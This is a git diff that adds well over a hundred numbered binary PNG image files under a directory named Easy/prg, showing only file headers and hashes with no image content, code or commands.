diff --git a/Easy/prg/23_002.png b/Easy/prg/23_002.png
new file mode 100644
index 0000000..73bc638
Binary files /dev/null and b/Easy/prg/23_002.png differ
diff --git a/Easy/prg/23_003.png b/Easy/prg/23_003.png
new file mode 100644
index 0000000..1ddd14f
Binary files /dev/null and b/Easy/prg/23_003.png differ
diff --git a/Easy/prg/23_004.png b/Easy/prg/23_004.png
new file mode 100644
index 0000000..9697cb9
Binary files /dev/null and b/Easy/prg/23_004.png differ
diff --git a/Easy/prg/23_005.png b/Easy/prg/23_005.png
new file mode 100644
index 0000000..a7c5905
Binary files /dev/null and b/Easy/prg/23_005.png differ
diff --git a/Easy/prg/23_006.png b/Easy/prg/23_006.png
new file mode 100644
index 0000000..3027b8c
Binary files /dev/null and b/Easy/prg/23_006.png differ
diff --git a/Easy/prg/24_001.png b/Easy/prg/24_001.png
new file mode 100644
index 0000000..1250e0b
Binary files /dev/null and b/Easy/prg/24_001.png differ
diff --git a/Easy/prg/24_002.png b/Easy/prg/24_002.png
new file mode 100644
index 0000000..c357776
Binary files /dev/null and b/Easy/prg/24_002.png differ
diff --git a/Easy/prg/24_003.png b/Easy/prg/24_003.png
new file mode 100644
index 0000000..39891a1
Binary files /dev/null and b/Easy/prg/24_003.png differ
diff --git a/Easy/prg/24_004.png b/Easy/prg/24_004.png
new file mode 100644
index 0000000..fbf7fff
Binary files /dev/null and b/Easy/prg/24_004.png differ
diff --git a/Easy/prg/24_005.png b/Easy/prg/24_005.png
new file mode 100644
index 0000000..9b359ea
Binary files /dev/null and b/Easy/prg/24_005.png differ
diff --git a/Easy/prg/26_001.png b/Easy/prg/26_001.png
new file mode 100644
index 0000000..6211989
Binary files /dev/null and b/Easy/prg/26_001.png differ
diff --git a/Easy/prg/26_002.png b/Easy/prg/26_002.png
new file mode 100644
index 0000000..e97e7a8
Binary files /dev/null and b/Easy/prg/26_002.png differ
diff --git a/Easy/prg/26_003.png b/Easy/prg/26_003.png
new file mode 100644
index 0000000..1b94315
Binary files /dev/null and b/Easy/prg/26_003.png differ
diff --git a/Easy/prg/26_004.png b/Easy/prg/26_004.png
new file mode 100644
index 0000000..d32f494
Binary files /dev/null and b/Easy/prg/26_004.png differ
diff --git a/Easy/prg/27_001.png b/Easy/prg/27_001.png
new file mode 100644
index 0000000..adbc7aa
Binary files /dev/null and b/Easy/prg/27_001.png differ
diff --git a/Easy/prg/27_002.png b/Easy/prg/27_002.png
new file mode 100644
index 0000000..70a527d
Binary files /dev/null and b/Easy/prg/27_002.png differ
diff --git a/Easy/prg/27_003.png b/Easy/prg/27_003.png
new file mode 100644
index 0000000..66bda2f
Binary files /dev/null and b/Easy/prg/27_003.png differ
diff --git a/Easy/prg/28_001.png b/Easy/prg/28_001.png
new file mode 100644
index 0000000..8c3a453
Binary files /dev/null and b/Easy/prg/28_001.png differ
diff --git a/Easy/prg/28_002.png b/Easy/prg/28_002.png
new file mode 100644
index 0000000..6eed321
Binary files /dev/null and b/Easy/prg/28_002.png differ
diff --git a/Easy/prg/28_003.png b/Easy/prg/28_003.png
new file mode 100644
index 0000000..f6c6010
Binary files /dev/null and b/Easy/prg/28_003.png differ
diff --git a/Easy/prg/28_004.png b/Easy/prg/28_004.png
new file mode 100644
index 0000000..598d19f
Binary files /dev/null and b/Easy/prg/28_004.png differ
diff --git a/Easy/prg/28_005.png b/Easy/prg/28_005.png
new file mode 100644
index 0000000..3af2b6c
Binary files /dev/null and b/Easy/prg/28_005.png differ
diff --git a/Easy/prg/29_001.png b/Easy/prg/29_001.png
new file mode 100644
index 0000000..bd25e75
Binary files /dev/null and b/Easy/prg/29_001.png differ
diff --git a/Easy/prg/29_002.png b/Easy/prg/29_002.png
new file mode 100644
index 0000000..ef061d5
Binary files /dev/null and b/Easy/prg/29_002.png differ
diff --git a/Easy/prg/29_003.png b/Easy/prg/29_003.png
new file mode 100644
index 0000000..31fd578
Binary files /dev/null and b/Easy/prg/29_003.png differ
diff --git a/Easy/prg/29_004.png b/Easy/prg/29_004.png
new file mode 100644
index 0000000..024f07d
Binary files /dev/null and b/Easy/prg/29_004.png differ
diff --git a/Easy/prg/29_005.png b/Easy/prg/29_005.png
new file mode 100644
index 0000000..e1975f5
Binary files /dev/null and b/Easy/prg/29_005.png differ
diff --git a/Easy/prg/30_001.png b/Easy/prg/30_001.png
new file mode 100644
index 0000000..8b97762
Binary files /dev/null and b/Easy/prg/30_001.png differ
diff --git a/Easy/prg/30_002.png b/Easy/prg/30_002.png
new file mode 100644
index 0000000..2df8b1e
Binary files /dev/null and b/Easy/prg/30_002.png differ
diff --git a/Easy/prg/30_003.png b/Easy/prg/30_003.png
new file mode 100644
index 0000000..4878765
Binary files /dev/null and b/Easy/prg/30_003.png differ
diff --git a/Easy/prg/30_004.png b/Easy/prg/30_004.png
new file mode 100644
index 0000000..1a5c106
Binary files /dev/null and b/Easy/prg/30_004.png differ
diff --git a/Easy/prg/30_005.png b/Easy/prg/30_005.png
new file mode 100644
index 0000000..ce59203
Binary files /dev/null and b/Easy/prg/30_005.png differ
diff --git a/Easy/prg/30_006.png b/Easy/prg/30_006.png
new file mode 100644
index 0000000..2dbad4a
Binary files /dev/null and b/Easy/prg/30_006.png differ
diff --git a/Easy/prg/31_001.png b/Easy/prg/31_001.png
new file mode 100644
index 0000000..4660e22
Binary files /dev/null and b/Easy/prg/31_001.png differ
diff --git a/Easy/prg/31_002.png b/Easy/prg/31_002.png
new file mode 100644
index 0000000..2fe96e6
Binary files /dev/null and b/Easy/prg/31_002.png differ
diff --git a/Easy/prg/32_001.png b/Easy/prg/32_001.png
new file mode 100644
index 0000000..36fa145
Binary files /dev/null and b/Easy/prg/32_001.png differ
diff --git a/Easy/prg/32_002.png b/Easy/prg/32_002.png
new file mode 100644
index 0000000..216ce61
Binary files /dev/null and b/Easy/prg/32_002.png differ
diff --git a/Easy/prg/32_003.png b/Easy/prg/32_003.png
new file mode 100644
index 0000000..b05c3dd
Binary files /dev/null and b/Easy/prg/32_003.png differ
diff --git a/Easy/prg/32_004.png b/Easy/prg/32_004.png
new file mode 100644
index 0000000..1bc29d6
Binary files /dev/null and b/Easy/prg/32_004.png differ
diff --git a/Easy/prg/32_005.png b/Easy/prg/32_005.png
new file mode 100644
index 0000000..f836ef8
Binary files /dev/null and b/Easy/prg/32_005.png differ
diff --git a/Easy/prg/32_006.png b/Easy/prg/32_006.png
new file mode 100644
index 0000000..adacde4
Binary files /dev/null and b/Easy/prg/32_006.png differ
diff --git a/Easy/prg/33_001.png b/Easy/prg/33_001.png
new file mode 100644
index 0000000..c3b16b1
Binary files /dev/null and b/Easy/prg/33_001.png differ
diff --git a/Easy/prg/35_001.png b/Easy/prg/35_001.png
new file mode 100644
index 0000000..d236eab
Binary files /dev/null and b/Easy/prg/35_001.png differ
diff --git a/Easy/prg/35_002.png b/Easy/prg/35_002.png
new file mode 100644
index 0000000..6bc73d8
Binary files /dev/null and b/Easy/prg/35_002.png differ
diff --git a/Easy/prg/35_003.png b/Easy/prg/35_003.png
new file mode 100644
index 0000000..c4d3f4e
Binary files /dev/null and b/Easy/prg/35_003.png differ
diff --git a/Easy/prg/35_004.png b/Easy/prg/35_004.png
new file mode 100644
index 0000000..0f268ff
Binary files /dev/null and b/Easy/prg/35_004.png differ
diff --git a/Easy/prg/35_005.png b/Easy/prg/35_005.png
new file mode 100644
index 0000000..6bd79aa
Binary files /dev/null and b/Easy/prg/35_005.png differ
diff --git a/Easy/prg/35_006.png b/Easy/prg/35_006.png
new file mode 100644
index 0000000..27098ce
Binary files /dev/null and b/Easy/prg/35_006.png differ
diff --git a/Easy/prg/35_007.png b/Easy/prg/35_007.png
new file mode 100644
index 0000000..91a9fce
Binary files /dev/null and b/Easy/prg/35_007.png differ
diff --git a/Easy/prg/35_008.png b/Easy/prg/35_008.png
new file mode 100644
index 0000000..9ce0c9a
Binary files /dev/null and b/Easy/prg/35_008.png differ
diff --git a/Easy/prg/36_001.png b/Easy/prg/36_001.png
new file mode 100644
index 0000000..44d2c19
Binary files /dev/null and b/Easy/prg/36_001.png differ
diff --git a/Easy/prg/36_002.png b/Easy/prg/36_002.png
new file mode 100644
index 0000000..f57ed16
Binary files /dev/null and b/Easy/prg/36_002.png differ
diff --git a/Easy/prg/36_003.png b/Easy/prg/36_003.png
new file mode 100644
index 0000000..01853b4
Binary files /dev/null and b/Easy/prg/36_003.png differ
diff --git a/Easy/prg/37_001.png b/Easy/prg/37_001.png
new file mode 100644
index 0000000..290ebe7
Binary files /dev/null and b/Easy/prg/37_001.png differ
diff --git a/Easy/prg/37_002.png b/Easy/prg/37_002.png
new file mode 100644
index 0000000..0052567
Binary files /dev/null and b/Easy/prg/37_002.png differ
diff --git a/Easy/prg/37_003.png b/Easy/prg/37_003.png
new file mode 100644
index 0000000..de33307
Binary files /dev/null and b/Easy/prg/37_003.png differ
diff --git a/Easy/prg/37_004.png b/Easy/prg/37_004.png
new file mode 100644
index 0000000..4f21820
Binary files /dev/null and b/Easy/prg/37_004.png differ
diff --git a/Easy/prg/38_001.png b/Easy/prg/38_001.png
new file mode 100644
index 0000000..78b6646
Binary files /dev/null and b/Easy/prg/38_001.png differ
diff --git a/Easy/prg/38_002.png b/Easy/prg/38_002.png
new file mode 100644
index 0000000..6827963
Binary files /dev/null and b/Easy/prg/38_002.png differ
diff --git a/Easy/prg/38_003.png b/Easy/prg/38_003.png
new file mode 100644
index 0000000..5cf6d4c
Binary files /dev/null and b/Easy/prg/38_003.png differ
diff --git a/Easy/prg/38_004.png b/Easy/prg/38_004.png
new file mode 100644
index 0000000..f63ee06
Binary files /dev/null and b/Easy/prg/38_004.png differ
diff --git a/Easy/prg/38_005.png b/Easy/prg/38_005.png
new file mode 100644
index 0000000..4bcdcbc
Binary files /dev/null and b/Easy/prg/38_005.png differ
diff --git a/Easy/prg/38_006.png b/Easy/prg/38_006.png
new file mode 100644
index 0000000..43bf847
Binary files /dev/null and b/Easy/prg/38_006.png differ
diff --git a/Easy/prg/38_007.png b/Easy/prg/38_007.png
new file mode 100644
index 0000000..33a7ce1
Binary files /dev/null and b/Easy/prg/38_007.png differ
diff --git a/Easy/prg/38_008.png b/Easy/prg/38_008.png
new file mode 100644
index 0000000..957d410
Binary files /dev/null and b/Easy/prg/38_008.png differ
diff --git a/Easy/prg/38_009.png b/Easy/prg/38_009.png
new file mode 100644
index 0000000..08367c8
Binary files /dev/null and b/Easy/prg/38_009.png differ
diff --git a/Easy/prg/38_010.png b/Easy/prg/38_010.png
new file mode 100644
index 0000000..f739aed
Binary files /dev/null and b/Easy/prg/38_010.png differ
diff --git a/Easy/prg/39_001.png b/Easy/prg/39_001.png
new file mode 100644
index 0000000..6a032ef
Binary files /dev/null and b/Easy/prg/39_001.png differ
diff --git a/Easy/prg/39_002.png b/Easy/prg/39_002.png
new file mode 100644
index 0000000..c5ffe6e
Binary files /dev/null and b/Easy/prg/39_002.png differ
diff --git a/Easy/prg/39_003.png b/Easy/prg/39_003.png
new file mode 100644
index 0000000..4cd635c
Binary files /dev/null and b/Easy/prg/39_003.png differ
diff --git a/Easy/prg/39_004.png b/Easy/prg/39_004.png
new file mode 100644
index 0000000..168c6c3
Binary files /dev/null and b/Easy/prg/39_004.png differ
diff --git a/Easy/prg/3_001.png b/Easy/prg/3_001.png
new file mode 100644
index 0000000..1c27ac7
Binary files /dev/null and b/Easy/prg/3_001.png differ
diff --git a/Easy/prg/3_002.png b/Easy/prg/3_002.png
new file mode 100644
index 0000000..657abdd
Binary files /dev/null and b/Easy/prg/3_002.png differ
diff --git a/Easy/prg/40_001.png b/Easy/prg/40_001.png
new file mode 100644
index 0000000..5b54987
Binary files /dev/null and b/Easy/prg/40_001.png differ
diff --git a/Easy/prg/40_002.png b/Easy/prg/40_002.png
new file mode 100644
index 0000000..24214ba
Binary files /dev/null and b/Easy/prg/40_002.png differ
diff --git a/Easy/prg/40_003.png b/Easy/prg/40_003.png
new file mode 100644
index 0000000..af3b953
Binary files /dev/null and b/Easy/prg/40_003.png differ
diff --git a/Easy/prg/41_001.png b/Easy/prg/41_001.png
new file mode 100644
index 0000000..d05a90a
Binary files /dev/null and b/Easy/prg/41_001.png differ
diff --git a/Easy/prg/41_002.png b/Easy/prg/41_002.png
new file mode 100644
index 0000000..2083644
Binary files /dev/null and b/Easy/prg/41_002.png differ
diff --git a/Easy/prg/41_003.png b/Easy/prg/41_003.png
new file mode 100644
index 0000000..88f0337
Binary files /dev/null and b/Easy/prg/41_003.png differ
diff --git a/Easy/prg/41_004.png b/Easy/prg/41_004.png
new file mode 100644
index 0000000..07cd3a9
Binary files /dev/null and b/Easy/prg/41_004.png differ
diff --git a/Easy/prg/41_005.png b/Easy/prg/41_005.png
new file mode 100644
index 0000000..c3bf31d
Binary files /dev/null and b/Easy/prg/41_005.png differ
diff --git a/Easy/prg/41_006.png b/Easy/prg/41_006.png
new file mode 100644
index 0000000..fb0cf3c
Binary files /dev/null and b/Easy/prg/41_006.png differ
diff --git a/Easy/prg/41_007.png b/Easy/prg/41_007.png
new file mode 100644
index 0000000..8e43f55
Binary files /dev/null and b/Easy/prg/41_007.png differ
diff --git a/Easy/prg/42_001.png b/Easy/prg/42_001.png
new file mode 100644
index 0000000..42041b7
Binary files /dev/null and b/Easy/prg/42_001.png differ
diff --git a/Easy/prg/43_001.png b/Easy/prg/43_001.png
new file mode 100644
index 0000000..e01ad64
Binary files /dev/null and b/Easy/prg/43_001.png differ
diff --git a/Easy/prg/43_002.png b/Easy/prg/43_002.png
new file mode 100644
index 0000000..396d1a9
Binary files /dev/null and b/Easy/prg/43_002.png differ
diff --git a/Easy/prg/43_003.png b/Easy/prg/43_003.png
new file mode 100644
index 0000000..bd4023d
Binary files /dev/null and b/Easy/prg/43_003.png differ
diff --git a/Easy/prg/43_004.png b/Easy/prg/43_004.png
new file mode 100644
index 0000000..a44d77d
Binary files /dev/null and b/Easy/prg/43_004.png differ
diff --git a/Easy/prg/44_001.png b/Easy/prg/44_001.png
new file mode 100644
index 0000000..f134464
Binary files /dev/null and b/Easy/prg/44_001.png differ
diff --git a/Easy/prg/44_002.png b/Easy/prg/44_002.png
new file mode 100644
index 0000000..797630d
Binary files /dev/null and b/Easy/prg/44_002.png differ
diff --git a/Easy/prg/44_003.png b/Easy/prg/44_003.png
new file mode 100644
index 0000000..964ae6d
Binary files /dev/null and b/Easy/prg/44_003.png differ
diff --git a/Easy/prg/44_004.png b/Easy/prg/44_004.png
new file mode 100644
index 0000000..c470a84
Binary files /dev/null and b/Easy/prg/44_004.png differ
diff --git a/Easy/prg/44_005.png b/Easy/prg/44_005.png
new file mode 100644
index 0000000..7dbbfcc
Binary files /dev/null and b/Easy/prg/44_005.png differ
diff --git a/Easy/prg/44_006.png b/Easy/prg/44_006.png
new file mode 100644
index 0000000..c1bf5c1
Binary files /dev/null and b/Easy/prg/44_006.png differ
diff --git a/Easy/prg/44_007.png b/Easy/prg/44_007.png
new file mode 100644
index 0000000..d16fc59
Binary files /dev/null and b/Easy/prg/44_007.png differ
diff --git a/Easy/prg/45_001.png b/Easy/prg/45_001.png
new file mode 100644
index 0000000..f250b3f
Binary files /dev/null and b/Easy/prg/45_001.png differ
diff --git a/Easy/prg/45_002.png b/Easy/prg/45_002.png
new file mode 100644
index 0000000..5284aa4
Binary files /dev/null and b/Easy/prg/45_002.png differ
diff --git a/Easy/prg/45_003.png b/Easy/prg/45_003.png
new file mode 100644
index 0000000..671da6a
Binary files /dev/null and b/Easy/prg/45_003.png differ
diff --git a/Easy/prg/45_004.png b/Easy/prg/45_004.png
new file mode 100644
index 0000000..8c506c3
Binary files /dev/null and b/Easy/prg/45_004.png differ
diff --git a/Easy/prg/45_005.png b/Easy/prg/45_005.png
new file mode 100644
index 0000000..220658f
Binary files /dev/null and b/Easy/prg/45_005.png differ
diff --git a/Easy/prg/45_006.png b/Easy/prg/45_006.png
new file mode 100644
index 0000000..d00ee6d
Binary files /dev/null and b/Easy/prg/45_006.png differ
diff --git a/Easy/prg/45_007.png b/Easy/prg/45_007.png
new file mode 100644
index 0000000..eac7a17
Binary files /dev/null and b/Easy/prg/45_007.png differ
diff --git a/Easy/prg/45_008.png b/Easy/prg/45_008.png
new file mode 100644
index 0000000..675c4d4
Binary files /dev/null and b/Easy/prg/45_008.png differ
diff --git a/Easy/prg/45_009.png b/Easy/prg/45_009.png
new file mode 100644
index 0000000..bf7adbe
Binary files /dev/null and b/Easy/prg/45_009.png differ
diff --git a/Easy/prg/45_010.png b/Easy/prg/45_010.png
new file mode 100644
index 0000000..b814228
Binary files /dev/null and b/Easy/prg/45_010.png differ
diff --git a/Easy/prg/45_011.png b/Easy/prg/45_011.png
new file mode 100644
index 0000000..fece706
Binary files /dev/null and b/Easy/prg/45_011.png differ
diff --git a/Easy/prg/45_012.png b/Easy/prg/45_012.png
new file mode 100644
index 0000000..4c431a9
Binary files /dev/null and b/Easy/prg/45_012.png differ
diff --git a/Easy/prg/45_013.png b/Easy/prg/45_013.png
new file mode 100644
index 0000000..33b948f
Binary files /dev/null and b/Easy/prg/45_013.png differ
diff --git a/Easy/prg/45_014.png b/Easy/prg/45_014.png
new file mode 100644
index 0000000..ef8e5ce
Binary files /dev/null and b/Easy/prg/45_014.png differ
diff --git a/Easy/prg/45_015.png b/Easy/prg/45_015.png
new file mode 100644
index 0000000..9aa82be
Binary files /dev/null and b/Easy/prg/45_015.png differ
diff --git a/Easy/prg/45_016.png b/Easy/prg/45_016.png
new file mode 100644
index 0000000..660bfe5
Binary files /dev/null and b/Easy/prg/45_016.png differ
diff --git a/Easy/prg/46_001.png b/Easy/prg/46_001.png
new file mode 100644
index 0000000..db251ce
Binary files /dev/null and b/Easy/prg/46_001.png differ
diff --git a/Easy/prg/46_002.png b/Easy/prg/46_002.png
new file mode 100644
index 0000000..cccafb9
Binary files /dev/null and b/Easy/prg/46_002.png differ
diff --git a/Easy/prg/46_003.png b/Easy/prg/46_003.png
new file mode 100644
index 0000000..59ae82a
Binary files /dev/null and b/Easy/prg/46_003.png differ
diff --git a/Easy/prg/46_004.png b/Easy/prg/46_004.png
new file mode 100644
index 0000000..0fa23b4
Binary files /dev/null and b/Easy/prg/46_004.png differ
diff --git a/Easy/prg/46_005.png b/Easy/prg/46_005.png
new file mode 100644
index 0000000..ae6f500
Binary files /dev/null and b/Easy/prg/46_005.png differ
diff --git a/Easy/prg/46_006.png b/Easy/prg/46_006.png
new file mode 100644
index 0000000..fc71864
Binary files /dev/null and b/Easy/prg/46_006.png differ
diff --git a/Easy/prg/46_007.png b/Easy/prg/46_007.png
new file mode 100644
index 0000000..61052b8
Binary files /dev/null and b/Easy/prg/46_007.png differ
diff --git a/Easy/prg/46_008.png b/Easy/prg/46_008.png
new file mode 100644
index 0000000..c1d931b
Binary files /dev/null and b/Easy/prg/46_008.png differ
diff --git a/Easy/prg/46_009.png b/Easy/prg/46_009.png
new file mode 100644
index 0000000..f0757d7
Binary files /dev/null and b/Easy/prg/46_009.png differ
diff --git a/Easy/prg/46_010.png b/Easy/prg/46_010.png
new file mode 100644
index 0000000..3428f95
Binary files /dev/null and b/Easy/prg/46_010.png differ
diff --git a/Easy/prg/46_011.png b/Easy/prg/46_011.png
new file mode 100644
index 0000000..fe5c911
Binary files /dev/null and b/Easy/prg/46_011.png differ
diff --git a/Easy/prg/46_012.png b/Easy/prg/46_012.png
new file mode 100644
index 0000000..b79b585
Binary files /dev/null and b/Easy/prg/46_012.png differ
diff --git a/Easy/prg/46_013.png b/Easy/prg/46_013.png
new file mode 100644
index 0000000..4232e2e
Binary files /dev/null and b/Easy/prg/46_013.png differ
diff --git a/Easy/prg/46_014.png b/Easy/prg/46_014.png
new file mode 100644
index 0000000..28e1688
Binary files /dev/null and b/Easy/prg/46_014.png differ
diff --git a/Easy/prg/47_001.png b/Easy/prg/47_001.png
new file mode 100644
index 0000000..8f20297
Binary files /dev/null and b/Easy/prg/47_001.png differ
diff --git a/Easy/prg/47_002.png b/Easy/prg/47_002.png
new file mode 100644
index 0000000..5288f13
Binary files /dev/null and b/Easy/prg/47_002.png differ
diff --git a/Easy/prg/48_001.png b/Easy/prg/48_001.png
new file mode 100644
index 0000000..7b424b2
Binary files /dev/null and b/Easy/prg/48_001.png differ
diff --git a/Easy/prg/48_002.png b/Easy/prg/48_002.png
new file mode 100644
index 0000000..7c4df88
Binary files /dev/null and b/Easy/prg/48_002.png differ
diff --git a/Easy/prg/48_003.png b/Easy/prg/48_003.png
new file mode 100644
index 0000000..84cc7a9
Binary files /dev/null and b/Easy/prg/48_003.png differ
diff --git a/Easy/prg/48_004.png b/Easy/prg/48_004.png
new file mode 100644
index 0000000..a038bbe
Binary files /dev/null and b/Easy/prg/48_004.png differ
diff --git a/Easy/prg/48_005.png b/Easy/prg/48_005.png
new file mode 100644
index 0000000..cfcc78f
Binary files /dev/null and b/Easy/prg/48_005.png differ
diff --git a/Easy/prg/48_006.png b/Easy/prg/48_006.png
new file mode 100644
index 0000000..e9fb48b
Binary files /dev/null and b/Easy/prg/48_006.png differ
diff --git a/Easy/prg/48_007.png b/Easy/prg/48_007.png
new file mode 100644
index 0000000..e9e38c9
Binary files /dev/null and b/Easy/prg/48_007.png differ
diff --git a/Easy/prg/48_008.png b/Easy/prg/48_008.png
new file mode 100644
index 0000000..f5a9c53
Binary files /dev/null and b/Easy/prg/48_008.png differ
diff --git a/Easy/prg/48_009.png b/Easy/prg/48_009.png
new file mode 100644
index 0000000..48f6056
Binary files /dev/null and b/Easy/prg/48_009.png differ
diff --git a/Easy/prg/49_001.png b/Easy/prg/49_001.png
new file mode 100644
index 0000000..6c2354a
Binary files /dev/null and b/Easy/prg/49_001.png differ
diff --git a/Easy/prg/4_001.png b/Easy/prg/4_001.png
new file mode 100644
index 0000000..7298097
Binary files /dev/null and b/Easy/prg/4_001.png differ
diff --git a/Easy/prg/4_002.png b/Easy/prg/4_002.png
new file mode 100644
index 0000000..70f800b
Binary files /dev/null and b/Easy/prg/4_002.png differ
diff --git a/Easy/prg/4_003.png b/Easy/prg/4_003.png
new file mode 100644
index 0000000..2e7966c
Binary files /dev/null and b/Easy/prg/4_003.png differ
diff --git a/Easy/prg/4_004.png b/Easy/prg/4_004.png
new file mode 100644
index 0000000..d28f672
Binary files /dev/null and b/Easy/prg/4_004.png differ
diff --git a/Easy/prg/50_001.png b/Easy/prg/50_001.png
new file mode 100644
index 0000000..2959b41
Binary files /dev/null and b/Easy/prg/50_001.png differ
diff --git a/Easy/prg/50_002.png b/Easy/prg/50_002.png
new file mode 100644
index 0000000..2063101
Binary files /dev/null and b/Easy/prg/50_002.png differ
diff --git a/Easy/prg/50_003.png b/Easy/prg/50_003.png
new file mode 100644
index 0000000..002915d
Binary files /dev/null and b/Easy/prg/50_003.png differ
diff --git a/Easy/prg/50_004.png b/Easy/prg/50_004.png
new file mode 100644
index 0000000..dfe7e38
Binary files /dev/null and b/Easy/prg/50_004.png differ
diff --git a/Easy/prg/50_005.png b/Easy/prg/50_005.png
new file mode 100644
index 0000000..330724b
Binary files /dev/null and b/Easy/prg/50_005.png differ
diff --git a/Easy/prg/50_006.png b/Easy/prg/50_006.png
new file mode 100644
index 0000000..ea95152
Binary files /dev/null and b/Easy/prg/50_006.png differ
diff --git a/Easy/prg/50_007.png b/Easy/prg/50_007.png
new file mode 100644
index 0000000..f74e800
Binary files /dev/null and b/Easy/prg/50_007.png differ
diff --git a/Easy/prg/50_008.png b/Easy/prg/50_008.png
new file mode 100644
index 0000000..e56f3d2
Binary files /dev/null and b/Easy/prg/50_008.png differ
diff --git a/Easy/prg/51_001.png b/Easy/prg/51_001.png
new file mode 100644
index 0000000..cee6f31
Binary files /dev/null and b/Easy/prg/51_001.png differ
diff --git a/Easy/prg/51_002.png b/Easy/prg/51_002.png
new file mode 100644
index 0000000..23fdeb9
Binary files /dev/null and b/Easy/prg/51_002.png differ
diff --git a/Easy/prg/51_003.png b/Easy/prg/51_003.png
new file mode 100644
index 0000000..e42664e
Binary files /dev/null and b/Easy/prg/51_003.png differ
diff --git a/Easy/prg/51_004.png b/Easy/prg/51_004.png
new file mode 100644
index 0000000..9b59db3
Binary files /dev/null and b/Easy/prg/51_004.png differ
diff --git a/Easy/prg/51_005.png b/Easy/prg/51_005.png
new file mode 100644
index 0000000..5618394
Binary files /dev/null and b/Easy/prg/51_005.png differ
diff --git a/Easy/prg/51_006.png b/Easy/prg/51_006.png
new file mode 100644
index 0000000..4e4d32a
Binary files /dev/null and b/Easy/prg/51_006.png differ
diff --git a/Easy/prg/51_007.png b/Easy/prg/51_007.png
new file mode 100644
index 0000000..9b4a846
Binary files /dev/null and b/Easy/prg/51_007.png differ
diff --git a/Easy/prg/51_008.png b/Easy/prg/51_008.png
new file mode 100644
index 0000000..f1183cb
Binary files /dev/null and b/Easy/prg/51_008.png differ
diff --git a/Easy/prg/51_009.png b/Easy/prg/51_009.png
new file mode 100644
index 0000000..dc5e512
Binary files /dev/null and b/Easy/prg/51_009.png differ
diff --git a/Easy/prg/51_010.png b/Easy/prg/51_010.png
new file mode 100644
index 0000000..78ac99a
Binary files /dev/null and b/Easy/prg/51_010.png differ
diff --git a/Easy/prg/51_011.png b/Easy/prg/51_011.png
new file mode 100644
index 0000000..04d0b74
Binary files /dev/null and b/Easy/prg/51_011.png differ
diff --git a/Easy/prg/51_012.png b/Easy/prg/51_012.png
new file mode 100644
index 0000000..461b8fb
Binary files /dev/null and b/Easy/prg/51_012.png differ
diff --git a/Easy/prg/51_013.png b/Easy/prg/51_013.png
new file mode 100644
index 0000000..35b0dc6
Binary files /dev/null and b/Easy/prg/51_013.png differ
diff --git a/Easy/prg/51_014.png b/Easy/prg/51_014.png
new file mode 100644
index 0000000..278cacf
Binary files /dev/null and b/Easy/prg/51_014.png differ
diff --git a/Easy/prg/51_015.png b/Easy/prg/51_015.png
new file mode 100644
index 0000000..5b91a99
Binary files /dev/null and b/Easy/prg/51_015.png differ
diff --git a/Easy/prg/51_016.png b/Easy/prg/51_016.png
new file mode 100644
index 0000000..e89412b
Binary files /dev/null and b/Easy/prg/51_016.png differ
diff --git a/Easy/prg/51_017.png b/Easy/prg/51_017.png
new file mode 100644
index 0000000..e5fbff4
Binary files /dev/null and b/Easy/prg/51_017.png differ
diff --git a/Easy/prg/51_018.png b/Easy/prg/51_018.png
new file mode 100644
index 0000000..398247f
Binary files /dev/null and b/Easy/prg/51_018.png differ
diff --git a/Easy/prg/51_019.png b/Easy/prg/51_019.png
new file mode 100644
index 0000000..8f3d0fd
Binary files /dev/null and b/Easy/prg/51_019.png differ
diff --git a/Easy/prg/51_020.png b/Easy/prg/51_020.png
new file mode 100644
index 0000000..dc8836c
Binary files /dev/null and b/Easy/prg/51_020.png differ
diff --git a/Easy/prg/52_001.png b/Easy/prg/52_001.png
new file mode 100644
index 0000000..cfcbc09
Binary files /dev/null and b/Easy/prg/52_001.png differ
diff --git a/Easy/prg/52_002.png b/Easy/prg/52_002.png
new file mode 100644
index 0000000..fb62b24
Binary files /dev/null and b/Easy/prg/52_002.png differ
diff --git a/Easy/prg/52_003.png b/Easy/prg/52_003.png
new file mode 100644
index 0000000..756b6b6
Binary files /dev/null and b/Easy/prg/52_003.png differ
diff --git a/Easy/prg/52_004.png b/Easy/prg/52_004.png
new file mode 100644
index 0000000..d8dfa6b
Binary files /dev/null and b/Easy/prg/52_004.png differ
diff --git a/Easy/prg/52_005.png b/Easy/prg/52_005.png
new file mode 100644
index 0000000..8d7b19c
Binary files /dev/null and b/Easy/prg/52_005.png differ
diff --git a/Easy/prg/52_006.png b/Easy/prg/52_006.png
new file mode 100644
index 0000000..123ca67
Binary files /dev/null and b/Easy/prg/52_006.png differ
diff --git a/Easy/prg/52_007.png b/Easy/prg/52_007.png
new file mode 100644
index 0000000..940c80a
Binary files /dev/null and b/Easy/prg/52_007.png differ
diff --git a/Easy/prg/52_008.png b/Easy/prg/52_008.png
new file mode 100644
index 0000000..df42a99
Binary files /dev/null and b/Easy/prg/52_008.png differ
diff --git a/Easy/prg/52_009.png b/Easy/prg/52_009.png
new file mode 100644
index 0000000..862e205
Binary files /dev/null and b/Easy/prg/52_009.png differ
diff --git a/Easy/prg/52_010.png b/Easy/prg/52_010.png
new file mode 100644
index 0000000..1caacdb
Binary files /dev/null and b/Easy/prg/52_010.png differ
diff --git a/Easy/prg/52_011.png b/Easy/prg/52_011.png
new file mode 100644
index 0000000..cb94935
Binary files /dev/null and b/Easy/prg/52_011.png differ
diff --git a/Easy/prg/52_012.png b/Easy/prg/52_012.png
new file mode 100644
index 0000000..2514e9b
Binary files /dev/null and b/Easy/prg/52_012.png differ
diff --git a/Easy/prg/52_013.png b/Easy/prg/52_013.png
new file mode 100644
index 0000000..9f14033
Binary files /dev/null and b/Easy/prg/52_013.png differ
diff --git a/Easy/prg/53_001.png b/Easy/prg/53_001.png
new file mode 100644
index 0000000..59aff5a
Binary files /dev/null and b/Easy/prg/53_001.png differ
diff --git a/Easy/prg/53_002.png b/Easy/prg/53_002.png
new file mode 100644
index 0000000..86c9746
Binary files /dev/null and b/Easy/prg/53_002.png differ
diff --git a/Easy/prg/53_003.png b/Easy/prg/53_003.png
new file mode 100644
index 0000000..f7733e9
Binary files /dev/null and b/Easy/prg/53_003.png differ
diff --git a/Easy/prg/53_004.png b/Easy/prg/53_004.png
new file mode 100644
index 0000000..2887a14
Binary files /dev/null and b/Easy/prg/53_004.png differ
diff --git a/Easy/prg/53_005.png b/Easy/prg/53_005.png
new file mode 100644
index 0000000..6a51622
Binary files /dev/null and b/Easy/prg/53_005.png differ
diff --git a/Easy/prg/53_006.png b/Easy/prg/53_006.png
new file mode 100644
index 0000000..ceb0800
Binary files /dev/null and b/Easy/prg/53_006.png differ
